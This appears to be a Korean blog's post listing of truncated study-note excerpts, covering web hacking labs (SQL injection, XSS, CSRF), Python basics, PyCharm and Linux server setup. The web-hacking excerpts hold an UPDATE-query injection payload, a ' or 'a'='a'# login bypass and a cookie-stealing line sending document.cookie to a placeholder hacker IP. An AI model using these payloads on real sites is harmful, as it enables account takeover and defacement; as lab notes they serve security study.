이미지 다운로드를 클릭하면 다운로드 횟수가 증가하는걸보고 업데이트 유추 이미지다운첫번쨰꺼를 누르고버프수트로 잡았을떄 filenum=1 이거를 2로바꾸면 첨부파일의 두번쨰 꺼가 보이게되는것을보고 filenum=1이서버쿼리의 일부분이되는걸알수있다 모든게시글이 같은 내용으로 수정이된다. 따라서 내가 지정한 게시글만 수정되도록한다. concat함수를 이용해 그전에 주입했던 스크립트들을 살려두고 또 하나의 스크립트를 넣기위해 (웹해킹 사이트말고 제로보드사이트.) 1 대신 1=10,memo=''+where+no=64%23 을 입력 update board set download1=10,memo=''+where+no=64%23=download1=10,memo=''+where+no=64%23+1 1=10,memo=''+..

http://192.168.0.100/webhack/ 관리자의 아이디가 killer 이며, 비밀번호는 모른다. 단서를 통해 비밀번호가 coffe로 시작하는 소문자 10자리 인것을 알아냈다. 관리자로 로그인하라 3자리는 w n o i *프록시로만 해결 방법1 ' or 'a'='a'# 방법 2 var b = Array.from(Array(26).keys(), x => String.fromCharCode(x + 97)); for(var i = 7; i

beebug,xss공격,beef툴,setoolkit,사용자계정탈취 ​ ​ ​ XSS (크로스사이트 스크립트, 크로스사이트 스크립팅, Cross Site Scripting) 취약점 1. 정의 - 검증되지 않은 입력 값으로 인해 사용자의 웹 브라우저에서 의도하지 않은 악성 스크립트가 실행되는 취약점이다. - 외부 입력이 동적 웹페이지 생성에 사용될 경우, 전송된 동적 웹 페이지를 열람하는 접속자의 권한으로 부적절한 스크립트가 수행되는 취약점이다. - 공격을 통해 사용자의 개인정보 및 쿠키정보 탈취, 악성코드 감염, 웹 페이지 변조 등이 발생한다. - 서버를 공격하는게 아니라, 서버를 경유해 클라이언트를 공격하는 것이다. 시판이나 웹 메일 등에 악의적인 스크립트를 삽입하여 비정상적인 페이지가 보이게해 타 사용..

document.location=http://해커ip/cookie=?document.cookie csrf 크로사이트 요청 위조 피해자의 아이디는 알지만 비밀번호는 몰라.그래도 로그인 하고싶다. 피해자의 계정 비밀번호를 내가원하는 값으로 바꾸게 하자. 요청위조 내pc에서 내 비밀번호를 바꿔보니 정상적인 요청은 다음과 같다. www.naver.com/account.jsp?passwd=ksdfgy849 https://nid.naver.com/user2/help/myInfo.nhn?m=viewChangePasswd&lang=ko_KR&pass=034848dw4qddqd pass=~~~~이걸추가하면 비밀번호가 초기화 되더라 ㅇ이걸 사용자가 실행을하면 비밀번호가 바뀜 비밀번호를 변경하는 요청(url)을 피해자가 실..

​ ​ ​ ​ ​ ​ inStr = inFp.readline() print (inStr, end='') 사람마다 써야됨 inFp.close()로 안닫으면 열림 ​ ---------------------------------------------- ​ ​ ​ ​ ​ ​ ​ ​ ####################파일 입출력 ​ inFp = None ​ # 파일이 저장될 변수 ​ inStr = '' ​ ## 파일 읽기 ​ inFp = open("C:/data1.txt","r",encoding="utf-8") ​ # 변수에 열어볼 파일 내용을 저장 # open 함수를 사용 , 파일경로 "r" 읽기 모드, 인코딩 맞추기 #경로에 /슬래쉬 사용할떄는 1개, ||역슬래쉬 사용할떄는 2개 #C:\\data1.txt ..

''' defcalc(v1,v2,op): result=0 ifop=="+": result=v1+v2 elifop=="-": resilt=vl-v2 elifop=="*": resilt=vl*v2 elifop=="/": resilt=vl/v2 returnresult #함수를사용하는부분(메인코드) res1=0 a,b,oper=0,0,""#변수초기화 a=int(input("첫번쨰숫자를입력하세요")) oper=input("계산입력(+,-,*,/):") b=int(input("두번쨰숫자를입력하세요")) res1=calc(a,b,oper) print("계산결과:%d%s%d=%d"%(a,oper,b,res1)) whiletrue: a=int(input("첫번쨰숫자를입력하세요")) oper=input("계산입력(+,-,..

# #문자열은 기본적으로 리스트랑 비슷한 사용형식을 갖는다 # # # ll=["김유성의 하드코딩"] # ss = "김유성의 하드코딩" # print(ll[0]) # print(ss[0]) # # #리스트와 동일하게 철자 자리값 출력 # # print(len(ss)) # # # 문자열의 길이를 출력 # # ##문자열 입력받은후 문자열 사이에 특수문자넣기 # ss = "김유성의 하드코딩" # sslen=len(ss) # # for i in range(0,sslen) : # print(ss[i]+'$', end="") # print("") # # # ##########문자열 관련 함수 # # ss = "kim's HardCording" # # print(ss.upper()) # # #upper 대문자로 전환 ..

# # # #리스트 # # # #여러개의 변수를 하나로 묶어주는거 # # # # #단독으로 사용하기 보다 for,while 과 함꼐 응용해서 사용 # # # # #변수 명을 사용하는것과 완벽하게 동일한 리스트명사요 # # # # # # # # """ # # # # 형식 # # # # a={1,2,3,4,5,6,7,8,9,10} # # # # """ # # # # # # # # #단순변수 사용 # # # # a=int(input("1번쨰 숫자")) # # # # b=int(input("2번쨰 숫자")) # # # # c=int(input("3번쨰 숫자")) # # # # d=int(input("4번쨰 숫자")) # # # # sum= a+b+c+d # # # # print(sum) # # # # # # #..

#while은 for 문처럼 어떤 명령어를 반복할 때 사용한다 #for의 경우에는 range함수 안에 값을 넣어 반복 횟수를 제이 #whle 은 조건식을 만들어 조건이 성립 될떄 까지 반복문을 실행 """ 형식 변수= 시작값(초기화) while 변수 종료 #사용자가 종료할떄 까지 프로그램이 종료되지않기위해 사용 #간단한 계산기 무한루프 이용해 만들기 # sum = 0 # a,b = 0,0 # # # while True..

# 반복문 # 수십번, 수백번 반복되는 작업을 간단하게 반복문을 통해 구현 # for(횟수),while(조건문) """ 형식 for 변수(i) in range (시작값, 끝값+1, 증가값) 실행문 작성(들여쓰기!!!!조심!!!!!!!!) """ # print("장영재 천재") # print("장영재 천재") # print("장영재 천재") # print("장영재 천재") # print("장영재 천재") # print("장영재 천재") # print("장영재 천재") # # print("장영재 천재") # # print("장영재 천재") # # print("장영재 천재") # # for i in range (0,10,1) : # print("장영재 천재",i) # # # i = 0 # for i in ra..

# # 조건문 if # # if로 명령어가 실행될 조건을 적는다 # # 조건이 참일 경우에 다음중에 실행할 명령어를 입력한다 # #들여쓰기!!!!!!!!!!!!조심하기!!!!!!!!!!!!! # # a=200 # if a= 80 : print ("B학점") else : if score >= 70 : print("c학점") else : if score >= 60 : print("D학점") else : print("F학점") if score >= 90 : print("A학점") elif score >= 80 : print("B학점") elif score >= 80 : print("C학점") elif score >= 70 : print("D학점") elif score >= 600 : print("F학점") Q..

#산술연산자 # = 등호가 아님, 대입연산자 a=a+3 나 자신에게 3을 더함 #-= #-= , /=, *= #//, % , ** a= 10 a += 5 ; print(a) a -= 5 ; print(a) a *= 5 ; print(a) a /= 5 ; print(a) # quiz # 통장에 있는 돈을 전부 동전으로 바꾸기 #1. 통장에 있는 액수를 입력하세요 #2. 돈 ,오백원, 백원 , 오십원 , 십원 = 0,0,0,0,0 # 돈= int(input("김태명 돈내놔 동전으로 바꿔줄게:")) # 결과 = 오백원 %d개, 백원%d개,오십원%d개 ,십원 %d개 a= int(input("김태명 돈내놔 동전으로바꿔줄게:")) print("%d,%d,%d,%d"%((a/500),((a%500)/100),(((a..

''' print ("안녕하세요~") #영어,숫자,특수문자 구분x print (100+200) # 숫자 + 숫자 +> 연산 print("100"+"200") # 문자열 + 문자열 => 이어쓰기 print ("100 "*3) #문자열 * 숫자 +> 숫자만큼 반복 ##############c언어에서 사용하는 방식 print ("%d" % 100) # 숫자 100을 정수형식으로 출력 print("%d" % (100+20)) # 정수의 연산 값을 출력 print("김태명이 오늘 먹은 과자의 갯수는 %d개입니다" % 10000) ###########input() 함수 사용하기 ########## a = int(input("태명아 오늘 과자 몇개 먹었냐?? : " )) b = 5 print("김태명이 오늘 구매한 ..

alt shift e 누르면 print("Helloworld") Hello world 문자열 "" 감싸주기 숫자 print(65)이런거 ###주석처리 실행안함. print("Hello world") print("asdfasdsafsdfa") print(65) #####주석처리#### #print(): 출력해주는 함수(문자,숫자 etc,,,) #print ("문자열") print('문자열') 문자열은 양 옆에 큰 or 작은 따옴포가 붙어야한다. # print(숫자), print(변수): 숫자,변수는 '' "" 사용 x ----------------------------------------------- a = 20 b = 10 #주석처리 """"""" 여러줄을 주석처리할떄 큰 따옴포 안에 작성하면 ok "..

https://www.jetbrains.com/ko-kr/pycharm/download/#section=windows 무료버전 파이참 커뮤니티 다운. d드라이브에 파이썬폴더하나 만들어서 경로지정 ################################################################## # pycham 단축키 정리 # ################################################################## # File -> Settings -> Apperance -> Theme -> [windows 10 light] # 전체 실행 폴더 선택 및 실행 : Alt + Shift + F10 # 전체 실행 : Shift + F10 # 단일 실행 : Alt..

시나리오 회사에서 이번에 리눅스 전용의 교육장을 구축하려고 한다. 그래서 100대의 컴퓨터에 가상머신이 아닌 직접 CentOS를 설치하려고 한다. 처음에는 CentOS DVD 몇 개를 준비한 후, 들고 왔다갔다하면서 설치할 계획이었다. 시간이 오래 걸리겠지만 가능한 방법이다. 그런데 보안 문제 때문에 교육장 컴퓨터는 입/출력을 할 수 있는 Floppy/DVD/USB 장치를 모두 제거했다는 문제가 있다. 이 상태로는 3장에서 배운 설치 방법으로 설치할 방법이 없다. 사전 부팅 실행 환경 또는 간단히 PXE(Pre-boot eXecution Environment)는 네트워크 인터페이스를 통해 컴퓨터를 부팅할 수 있게 해주는 환경이다. 네트워크를 통한거기때문에 연결만되있으면 상관은없는거 연결이안되있으면 부팅도..

RAID 정의 RAID(Redundant Array of Inexpensive Disks)는 여러 개의 디스크를 하나의 디스크처럼 사용함 비용 절감 + 신뢰성 향상 + 성능 향상의 효과를 냄 하드웨어 RAID 하드웨어 제조업체에서 여러 개의 하드디스크를 가지고 장비를 만들어서 그 자체를 공급 좀더 안정적이지만, 상당한 고가임 소프트웨어 RAID 고가의 하드웨어 RAID의 대안 운영체제에서 지원하는 방식 저렴한 비용으로 좀더 안전한 데이터의 저장이 가능 교재에서 진행하는 내용은 소프트웨어 RAID 임 RAID0 N배 최소 두장 근데 현업에서는 RAID0으로하면 한장 쓴다생각하셈 (NORMAL이라생각해) 스트라이프방식이라부름 늘어나면늘어날수록 빠름 근데 12개로묶었을떄 하나날아가면 다날아감 Raid 1 os..

세컨드에서 mail-cf dovecot vim /etc/mail/sendmail.cf 85 tak.com 264 127.0.0.1 삭제 systmectl restart sendmail vim /etc/mail/access makemap hash /etc/mail/access < /etc/mail/access 수정한걸 넘겨주는! vim /etc/dovecot/dovecot.conf 24.33번 주석제거 퍼스트 24.30.33번 주석제거 퍼스트 systemctl restart dovecot vim /etc/dovecot/conf.d/10-ssl.conf 8번 ssl =yes vim /etc/dovecot/conf.d/10-mail.conf 25,166 주석제거 121 = mail 로바꾸기 vim /etc/d..

E-Mail의 송수신에서 사용되는 프로토콜 •SMTP(Simple Mail Transfer Protocol) : 클라이언트가 메일을 보내거나, 메일 서버끼리 메일을 주고 받을 때 •POP3(Post Office Protocol) : 메일 서버에 도착되어 있는 메일을 클라이언트로 가져올 때 •IMAP(Internet Mail Access Protocol) : POP3와 같음 00:0c:29:d6:ab:b6 MTA(Mail Transfer Agent): 다른 MTA나 메일 사용자에게 메일을 보내거나 받는 역할을 한다. 이 과정을 RELAY 라고 부르며, 바이러스와 스팸 메일에 대한 필터링 기능을 갖고있다. 25번 포트를 사용하는 SMTP(Simple Mail Transfer Protocol)에 의해 이뤄진다..

First----------------------------------------------------------------------------------------------------------------- • DHCP(Dynamic Host Configuration Protocol) 서버가 하는 역할은 자신의 네트워크 안에 있는 클라이언트 컴퓨터가 부팅될 때 자동으로 IP주소, 서브 넷 마스크, 게이트웨이 주소, DNS 서버 주소를 할당해 주는 것임 • 일반 사용자는 IP에 관련된 어려운 정보를 알지 못해도, 인터넷을 사용하는 데는 더 이상 아무런 문제가 없어짐 • DHCP 서버의 가장 큰 장점은 관리하기 편하고 이용자가 편하다는 것 • 한정된 IP 주소를 가지고 더 많은 IP주소가 있는 것처럼 ..